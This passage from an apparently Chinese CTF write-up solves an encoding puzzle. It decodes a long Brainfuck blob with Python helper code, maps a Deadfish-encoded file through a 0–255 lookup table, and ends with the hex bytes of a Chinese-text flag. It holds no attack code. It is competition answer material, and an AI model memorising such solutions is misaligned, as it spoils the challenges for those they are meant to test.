<++++++++++++[->++++++++++++<]>4+.<3+[->3+<]>3+.<+++++++++++[->-----------<]>--------------.<9+[->9+<]>7+.<3+[->3-<]>5-.<++++++++++[->++++++++++<]>+++++++++++++++++++.<5+[->5+<]>+.6+.<+++++++++++++++[->---------------<]>-----------.<9+[->9+<]>9+.<++++++++++[->++++++++++<]>+++++++++++++.<+++++++++++++[->-------------<]>3-.<8+[->8+<]>.<4+[->4-<]>3-.<5+[->5+<]>9+.<8+[->8+<]>2+.<++++++++++[->----------<]>----------.<6+[->6+<]>9+.<4+[->4-<]>2-.<8+[->8-<]>------------.<5+[->5-<]>6-.<8+[->8+<]>+++++++++++++++.5-.<8+[->8-<]>----------.+.<7+[->7+<]>++++++++++++.<7+[->7-<]>--------------.<4+[->4+<]>4+.<4+[->4-<]>4-3.8+.8-.<9+[->9+<]>3+.6-.<++++++++++[->++++++++++<]>7+.<++++++++++[->----------<]>3-.<++++++++++++[->++++++++++++<]>++++++++++++++++++++.<9+[->9-<]>2-.<7+[->7+<]>8+.5+.<+++++++++++[->-----------<]>----------------.<9+[->9-<]>7-3.<7+[->7+<]>9+.<7+[->7-<]>5-.4-2.<3+[->3+<]>+.<3+[->3-<]>-.<6+[->6+<]>.<6+[->6-<]>7.<5+[->5+<]>7+.<5+[->5-<]>7-7.<++++++++++[->++++++++++<]>.2+.7-.<4+[->4+<]>.6+.-.<8+[->8-<]>6-.<8+[->8+<]>6+.4+.4-.<++++++++++[->----------<]>6-.<3+[->3-<]>-.<5+[->5+<]>7+.<5+[->5-<]>7-5.+.-.<4+[->4+<]>8+.<4+[->4-<]>8-.<+++++++++++[->+++++++++++<]>+++++++++++++++.<7+[->7+<]>7+.<4+[->4+<]>8+.<+++++++++++[->-----------<]>3-.<9+[->9-<]>3-.<8+[->8+<]>9+.<+++++++++++[->+++++++++++<]>+++++++++++++.<++++++++++++++[->--------------<]>------------------.<++++++++++++++[->++++++++++++++<]>+++++++++++++++++++++++++++.<+++++++++++[->-----------<]>9-.<+++++++++++[->+++++++++++<]>+.<+++++++++++[->-----------<]>3-.<9+[->9-<]>3-.<8+[->8+<]>9+.<+++++++++++[->+++++++++++<]>+++++++++++++.<++++++++++++++[->--------------<]>------------------.<++++++++++++++[->++++++++++++++<]>+++++++++++++++++++++++++++.<+++++++++++[->-----------<]>9-.<+++++++++++[->+++++++++++<]>+.<+++++++++++[->-----------<]>3-.<9+[->9-<]>3-.<8+[->8+<]>9+.<+++++++++++[->+++++++++++<]>+++++++++++++.<++++++++++++++[->--------------<]>------------------.<8+[->8+<]>+++++++++++++++.5-.<8+[->8-<]>6-.+.6-4.+.-.+.-.<9+[->9+<]>+++++++++++.<9+[->9-<]>-----------3.<+++++++++++[->+++++++++++<]>7+.<+++++++++++[->-----------<]>7-5.<'
# reg = re.compile(r'\d[+-]')
# res = re.findall(reg,bf)
# rr = re.sub(reg,' ',bf).split(' ')
# print(len(res))
# print(len(rr))
# for i in range(len(res)):
#     print(rr[i],end='')
#     print(int(res[i][0])*res[i][1],end='')
# print(rr[-1])
#
# bf = '++++++++[->++++++++<]>++++++++++++++++.-----.<++++++++[->--------<]>--------.+.<++++[->++++<]>.<++++[->----<]>----3.++++++++.--------.<+++++++++[->+++++++++<]>+++.------.<++++++++++[->++++++++++<]>+++++++.<++++++++++[->----------<]>---.<++++++++++++[->++++++++++++<]>++++++++++++++++++++.<+++++++++[->---------<]>--.<+++++++[->+++++++<]>++++++++.+++++.<+++++++++++[->-----------<]>----------------.<+++++++++[->---------<]>-------3.<+++++++[->+++++++<]>+++++++++.<+++++++[->-------<]>-----.----2.<+++[->+++<]>+.<+++[->---<]>-3.<++++++++++[->++++++++++<]>.++.-------.<++++[->++++<]>.++++++.-.<++++++++[->--------<]>------.<++++++++[->++++++++<]>++++++.++++.----.<++++++++++[->++++++++++<]>+++++.<+++++++++++[->-----------<]>-----------------.<+++++[->-----<]>---------.<+++++[->-----<]>----------.<+++[->---<]>-----.<+++++[->+++++<]>++++++++.<+++++[->-----<]>.<+++++++++++++++[->+++++++++++++++<]>++++++++++++++++++.<+++++++[->-------<]>.<+++++++++++[->-----------<]>--------------------.<++++++++++++[->++++++++++++<]>+++++++++++++++++++.<++++++++[->--------<]>--.<++++++++[->++++++++<]>+++++++.<+++++[->-----<]>----------.<++++++[->++++++<]>++++++.<++++[->++++<]>+++.<+++++++++++++++[->---------------<]>-----------.++++++++.<++++++++++[->++++++++++<]>++++++++++++.<+++++++++++[->-----------<]>--.+++.<++++++++[->++++++++<]>++++++++++.<++++++++++[->++++++++++<]>+++++++++++++++++++.<+++++++++++++[->-------------<]>-------------------.<++++++++++++[->++++++++++++<]>+++++++++++++.<+++++++++++[->-----------<]>----------.<+++[->+++<]>+++++.<++++++++++[->++++++++++<]>+++++++++++++++++.<++++++++++[->----------<]>-.<++++++++[->--------<]>----------.<+++++++[->+++++++<]>++++++++++++++.<+++++[->-----<]>--------.<+++++++++++++[->+++++++++++++<]>+++++++++++++++++++++.<++++++++++++++[->--------------<]>------.<+++++++++++++++[->+++++++++++++++<]>+++++.<++++++++++[->----------<]>-----------.---.<++++++++++[->----------<]>--.<+++++++++[->+++++++++<]>+++++++++++++++++.<++++++++++[->----------<]>--------------------.<++++++[->++++++<]>++++++++.<++++++++++++[->++++++++++++<]>+.<++++++++++++[->------------<]>---------------------.<++++++[->++++++<]>+++.<++++++++[->++++++++<]>+++++++++++++.<++++[->++++<]>+++.<++++++++[->--------<]>-------.<+++++++++++[->+++++++++++<]>++++++++++.<++++++++++++[->------------<]>----------.<+++++++++++[->+++++++++++<]>++++++++.<++++++++[->--------<]>----------.<+++[->---<]>----.<++++++++++[->----------<]>-------------------.<++++++++++++[->++++++++++++<]>+++++++++++++.<++++++++++++[->------------<]>-------------.<++++[->++++<]>+++++.<++++[->++++<]>++++++.<++++++++[->++++++++<]>+++++.<+++++++[->-------<]>---------.<+++++++[->-------<]>.<+++++++++++[->+++++++++++<]>++++++++++++++++++.<++++[->----<]>-------.<++++++++[->++++++++<]>+++++++++++++++.<++++++++++[->----------<]>.<++++++++[->--------<]>----------.<+++++++++[->+++++++++<]>++++++.<++++++++++[->----------<]>----------------.<++++++++++++[->++++++++++++<]>++++.<+++[->+++<]>+++.<+++++++++++[->-----------<]>--------------.<+++++++++[->+++++++++<]>+++++++.<+++[->---<]>-----.<++++++++++[->++++++++++<]>+++++++++++++++++++.<+++++[->+++++<]>+.++++++.<+++++++++++++++[->---------------<]>-----------.<+++++++++[->+++++++++<]>+++++++++.<++++++++++[->++++++++++<]>+++++++++++++.<+++++++++++++[->-------------<]>---.<++++++++[->++++++++<]>.<++++[->----<]>---.<+++++[->+++++<]>+++++++++.<++++++++[->++++++++<]>++.<++++++++++[->----------<]>----------.<++++++[->++++++<]>+++++++++.<++++[->----<]>--.<++++++++[->--------<]>------------.<+++++[->-----<]>------.<++++++++[->++++++++<]>+++++++++++++++.-----.<++++++++[->--------<]>----------.+.<+++++++[->+++++++<]>++++++++++++.<+++++++[->-------<]>--------------.<++++[->++++<]>++++.<++++[->----<]>----3.++++++++.--------.<+++++++++[->+++++++++<]>+++.------.<++++++++++[->++++++++++<]>+++++++.<++++++++++[->----------<]>---.<++++++++++++[->++++++++++++<]>++++++++++++++++++++.<+++++++++[->---------<]>--.<+++++++[->+++++++<]>++++++++.+++++.<+++++++++++[->-----------<]>----------------.<+++++++++[->---------<]>-------3.<+++++++[->+++++++<]>+++++++++.<+++++++[->-------<]>-----.----2.<+++[->+++<]>+.<+++[->---<]>-.<++++++[->++++++<]>.<++++++[->------<]>7.<+++++[->+++++<]>+++++++.<+++++[->-----<]>-------7.<++++++++++[->++++++++++<]>.++.-------.<++++[->++++<]>.++++++.-.<++++++++[->--------<]>------.<++++++++[->++++++++<]>++++++.++++.----.<++++++++++[->----------<]>------.<+++[->---<]>-.<+++++[->+++++<]>+++++++.<+++++[->-----<]>-------5.+.-.<++++[->++++<]>++++++++.<++++[->----<]>--------.<+++++++++++[->+++++++++++<]>+++++++++++++++.<+++++++[->+++++++<]>+++++++.<++++[->++++<]>++++++++.<+++++++++++[->-----------<]>---.<+++++++++[->---------<]>---.<++++++++[->++++++++<]>+++++++++.<+++++++++++[->+++++++++++<]>+++++++++++++.<++++++++++++++[->--------------<]>------------------.<++++++++++++++[->++++++++++++++<]>+++++++++++++++++++++++++++.<+++++++++++[->-----------<]>---------.<+++++++++++[->+++++++++++<]>+.<+++++++++++[->-----------<]>---.<+++++++++[->---------<]>---.<++++++++[->++++++++<]>+++++++++.<+++++++++++[->+++++++++++<]>+++++++++++++.<++++++++++++++[->--------------<]>------------------.<++++++++++++++[->++++++++++++++<]>+++++++++++++++++++++++++++.<+++++++++++[->-----------<]>---------.<+++++++++++[->+++++++++++<]>+.<+++++++++++[->-----------<]>---.<+++++++++[->---------<]>---.<++++++++[->++++++++<]>+++++++++.<+++++++++++[->+++++++++++<]>+++++++++++++.<++++++++++++++[->--------------<]>------------------.<++++++++[->++++++++<]>+++++++++++++++.-----.<++++++++[->--------<]>------.+.------4.+.-.+.-.<+++++++++[->+++++++++<]>+++++++++++.<+++++++++[->---------<]>-----------3.<+++++++++++[->+++++++++++<]>+++++++.<+++++++++++[->-----------<]>-------5.<'
# reg = re.compile(r'\d\.')
# res = re.findall(reg,bf)
# rr = re.sub(reg,' ',bf).split(' ')
# print(res)
# print(rr)
# for i in range(len(res)):
#     print(rr[i],end='')
#     print(int(res[i][0])*res[i][1],end='')
# print(rr[-1])

然后很坑的地方来了,试了很多python上的brainfuck解码发现解出来的压缩包都有问题,是坏的,最后tokeii师傅找到了可以把brainfuck解码成hex的网站https://gkucmierz.github.io/brainfuck-interpreter/,拿到最后一个zip
图片

解压后发现是isd三个字符组成的编码,一Google就查到了,是deadfish编码,写个脚本转换下

图片

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
d = {'1' :   'i',
'2' :   'ii',
'3' :   'iii',
'4' :   'iis',
'5' :   'iisi',
'6' :   'iisii',
'7' :   'iiisdd',
'8' :   'iiisd',
'9' :   'iiis',
'10' :  'iiisi',
'11' :  'iiisii',
'12' :  'iiisiii',
'13' :  'iissddd',
'14' :  'iissdd',
'15' :  'iissd',
'16' :  'iiss',
'17' :  'iissi',
'18' :  'iissii',
'19' :  'iissiii',
'20' :  'iissiiii',
'21' :  'iisisdddd',
'22' :  'iisisddd',
'23' :  'iisisdd',
'24' :  'iisisd',
'25' :  'iisis',
'26' :  'iisisi',
'27' :  'iisisii',
'28' :  'iisisiii',
'29' :  'iisisiiii',
'30' :  'iisisiiiii',
'31' :  'iisiisddddd',
'32' :  'iisiisdddd',
'33' :  'iisiisddd',
'34' :  'iisiisdd',
'35' :  'iisiisd',
'36' :  'iisiis',
'37' :  'iisiisi',
'38' :  'iisiisii',
'39' :  'iisiisiii',
'40' :  'iisiisiiii',
'41' :  'iisiisiiiii',
'42' :  'iisiisiiiiii',
'43' :  'iiisddsdddddd',
'44' :  'iiisddsddddd',
'45' :  'iiisddsdddd',
'46' :  'iiisddsddd',
'47' :  'iiisddsdd',
'48' :  'iiisddsd',
'49' :  'iiisdds',
'50' :  'iiisddsi',
'51' :  'iiisddsii',
'52' :  'iiisddsiii',
'53' :  'iiisddsiiii',
'54' :  'iiisddsiiiii',
'55' :  'iiisddsiiiiii',
'56' :  'iiisddsiiiiiii',
'57' :  'iiisdsddddddd',
'58' :  'iiisdsdddddd',
'59' :  'iiisdsddddd',
'60' :  'iiisdsdddd',
'61' :  'iiisdsddd',
'62' :  'iiisdsdd',
'63' :  'iiisdsd',
'64' :  'iiisds',
'65' :  'iiisdsi',
'66' :  'iiisdsii',
'67' :  'iiisdsiii',
'68' :  'iiisdsiiii',
'69' :  'iiisdsiiiii',
'70' :  'iiisdsiiiiii',
'71' :  'iiisdsiiiiiii',
'72' :  'iiisdsiiiiiiii',
'73' :  'iiissdddddddd',
'74' :  'iiissddddddd',
'75' :  'iiissdddddd',
'76' :  'iiissddddd',
'77' :  'iiissdddd',
'78' :  'iiissddd',
'79' :  'iiissdd',
'80' :  'iiissd',
'81' :  'iiiss',
'82' :  'iiissi',
'83' :  'iiissii',
'84' :  'iiissiii',
'85' :  'iiissiiii',
'86' :  'iiissiiiii',
'87' :  'iiissiiiiii',
'88' :  'iiissiiiiiii',
'89' :  'iiissiiiiiiii',
'90' :  'iiissiiiiiiiii',
'91' :  'iiisisddddddddd',
'92' :  'iiisisdddddddd',
'93' :  'iiisisddddddd',
'94' :  'iiisisdddddd',
'95' :  'iiisisddddd',
'96' :  'iiisisdddd',
'97' :  'iiisisddd',
'98' :  'iiisisdd',
'99' :  'iiisisd',
'100' : 'iiisis',
'101' : 'iiisisi',
'102' : 'iiisisii',
'103' : 'iiisisiii',
'104' : 'iiisisiiii',
'105' : 'iiisisiiiii',
'106' : 'iiisisiiiiii',
'107' : 'iiisisiiiiiii',
'108' : 'iiisisiiiiiiii',
'109' : 'iiisisiiiiiiiii',
'110' : 'iiisisiiiiiiiiii',
'111' : 'iiisiisdddddddddd',
'112' : 'iiisiisddddddddd',
'113' : 'iiisiisdddddddd',
'114' : 'iiisiisddddddd',
'115' : 'iiisiisdddddd',
'116' : 'iiisiisddddd',
'117' : 'iiisiisdddd',
'118' : 'iiisiisddd',
'119' : 'iiisiisdd',
'120' : 'iiisiisd',
'121' : 'iiisiis',
'122' : 'iiisiisi',
'123' : 'iiisiisii',
'124' : 'iiisiisiii',
'125' : 'iiisiisiiii',
'126' : 'iiisiisiiiii',
'127' : 'iiisiisiiiiii',
'128' : 'iiisiisiiiiiii',
'129' : 'iiisiisiiiiiiii',
'130' : 'iiisiisiiiiiiiii',
'131' : 'iiisiisiiiiiiiiii',
'132' : 'iiisiisiiiiiiiiiii',
'133' : 'iiisiiisddddddddddd',
'134' : 'iiisiiisdddddddddd',
'135' : 'iiisiiisddddddddd',
'136' : 'iiisiiisdddddddd',
'137' : 'iiisiiisddddddd',
'138' : 'iiisiiisdddddd',
'139' : 'iiisiiisddddd',
'140' : 'iiisiiisdddd',
'141' : 'iiisiiisddd',
'142' : 'iiisiiisdd',
'143' : 'iiisiiisd',
'144' : 'iiisiiis',
'145' : 'iiisiiisi',
'146' : 'iiisiiisii',
'147' : 'iiisiiisiii',
'148' : 'iiisiiisiiii',
'149' : 'iiisiiisiiiii',
'150' : 'iiisiiisiiiiii',
'151' : 'iiisiiisiiiiiii',
'152' : 'iiisiiisiiiiiiii',
'153' : 'iiisiiisiiiiiiiii',
'154' : 'iiisiiisiiiiiiiiii',
'155' : 'iiisiiisiiiiiiiiiii',
'156' : 'iiisiiisiiiiiiiiiiii',
'157' : 'iissdddsdddddddddddd',
'158' : 'iissdddsddddddddddd',
'159' : 'iissdddsdddddddddd',
'160' : 'iissdddsddddddddd',
'161' : 'iissdddsdddddddd',
'162' : 'iissdddsddddddd',
'163' : 'iissdddsdddddd',
'164' : 'iissdddsddddd',
'165' : 'iissdddsdddd',
'166' : 'iissdddsddd',
'167' : 'iissdddsdd',
'168' : 'iissdddsd',
'169' : 'iissddds',
'170' : 'iissdddsi',
'171' : 'iissdddsii',
'172' : 'iissdddsiii',
'173' : 'iissdddsiiii',
'174' : 'iissdddsiiiii',
'175' : 'iissdddsiiiiii',
'176' : 'iissdddsiiiiiii',
'177' : 'iissdddsiiiiiiii',
'178' : 'iissdddsiiiiiiiii',
'179' : 'iissdddsiiiiiiiiii',
'180' : 'iissdddsiiiiiiiiiii',
'181' : 'iissdddsiiiiiiiiiiii',
'182' : 'iissdddsiiiiiiiiiiiii',
'183' : 'iissddsddddddddddddd',
'184' : 'iissddsdddddddddddd',
'185' : 'iissddsddddddddddd',
'186' : 'iissddsdddddddddd',
'187' : 'iissddsddddddddd',
'188' : 'iissddsdddddddd',
'189' : 'iissddsddddddd',
'190' : 'iissddsdddddd',
'191' : 'iissddsddddd',
'192' : 'iissddsdddd',
'193' : 'iissddsddd',
'194' : 'iissddsdd',
'195' : 'iissddsd',
'196' : 'iissdds',
'197' : 'iissddsi',
'198' : 'iissddsii',
'199' : 'iissddsiii',
'200' : 'iissddsiiii',
'201' : 'iissddsiiiii',
'202' : 'iissddsiiiiii',
'203' : 'iissddsiiiiiii',
'204' : 'iissddsiiiiiiii',
'205' : 'iissddsiiiiiiiii',
'206' : 'iissddsiiiiiiiiii',
'207' : 'iissddsiiiiiiiiiii',
'208' : 'iissddsiiiiiiiiiiii',
'209' : 'iissddsiiiiiiiiiiiii',
'210' : 'iissddsiiiiiiiiiiiiii',
'211' : 'iissdsdddddddddddddd',
'212' : 'iissdsddddddddddddd',
'213' : 'iissdsdddddddddddd',
'214' : 'iissdsddddddddddd',
'215' : 'iissdsdddddddddd',
'216' : 'iissdsddddddddd',
'217' : 'iissdsdddddddd',
'218' : 'iissdsddddddd',
'219' : 'iissdsdddddd',
'220' : 'iissdsddddd',
'221' : 'iissdsdddd',
'222' : 'iissdsddd',
'223' : 'iissdsdd',
'224' : 'iissdsd',
'225' : 'iissds',
'226' : 'iissdsi',
'227' : 'iissdsii',
'228' : 'iissdsiii',
'229' : 'iissdsiiii',
'230' : 'iissdsiiiii',
'231' : 'iissdsiiiiii',
'232' : 'iissdsiiiiiii',
'233' : 'iissdsiiiiiiii',
'234' : 'iissdsiiiiiiiii',
'235' : 'iissdsiiiiiiiiii',
'236' : 'iissdsiiiiiiiiiii',
'237' : 'iissdsiiiiiiiiiiii',
'238' : 'iissdsiiiiiiiiiiiii',
'239' : 'iissdsiiiiiiiiiiiiii',
'240' : 'iissdsiiiiiiiiiiiiiii',
'241' : 'iissdsiiiiiiiiiiiiiiii',
'242' : 'iissdsiiiiiiiiiiiiiiiii',
'243' : 'iissdsiiiiiiiiiiiiiiiiii',
'244' : 'iissdsiiiiiiiiiiiiiiiiiii',
'245' : 'iissdsiiiiiiiiiiiiiiiiiiii',
'246' : 'iissdsiiiiiiiiiiiiiiiiiiiii',
'247' : 'iissdsiiiiiiiiiiiiiiiiiiiiii',
'248' : 'iissdsiiiiiiiiiiiiiiiiiiiiiii',
'249' : 'iissdsiiiiiiiiiiiiiiiiiiiiiiii',
'250' : 'iissdsiiiiiiiiiiiiiiiiiiiiiiiii',
'251' : 'iissdsiiiiiiiiiiiiiiiiiiiiiiiiii',
'252' : 'iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii',
'253' : 'iissdsiiiiiiiiiiiiiiiiiiiiiiiiiiii',
'254' : 'iissdsiiiiiiiiiiiiiiiiiiiiiiiiiiiii',
'255' : 'iissdsiiiiiiiiiiiiiiiiiiiiiiiiiiiiii'}
n_d= dict((v, k) for k, v in d.items())
s = 'iiisisiiiiiiiiii, iiisisi, iiisiisdd, iiisiisdddddd, iiisisd, iiisiisddddd, iiisisii, iiisiisii, iissddsdddddddd, iissdddsddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissddsdddddddd, iissdddsddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissddsdddddddd, iissdddsddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissdsddddddddddd, iissddsddddddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissdsddddddddddd, iissddsddddddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissddsdddddddd, iissdddsddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissddsdddddddd, iissdddsddd, iissdsddddddddddd, iissddsddddddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissddsdddddddd, iissdddsddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissdsddddddddddd, iissddsddddddd, iissdddsiiiiiii, iissdsiiiiiiiiiiiiiiiiiiiiiiiiiii, iissddsdddddddd, iissdddsddd, iiisiisiiii'.split(', ')
print(s)
for i in s[8:-1]:
    # print(chr(int(n_d[i])),end=' ')
    print(hex(int(n_d[i]))[2:],end=' ')

拿到一串hex

1
bc a6 b0 fc b0 fc bc a6 b0 fc b0 fc bc a6 b0 fc d6 bd b0 fc d6 bd b0 fc bc a6 b0 fc b0 fc bc a6 d6 bd b0 fc bc a6 b0 fc d6 bd b0 fc bc a6

放到winhex得到中文flag
图片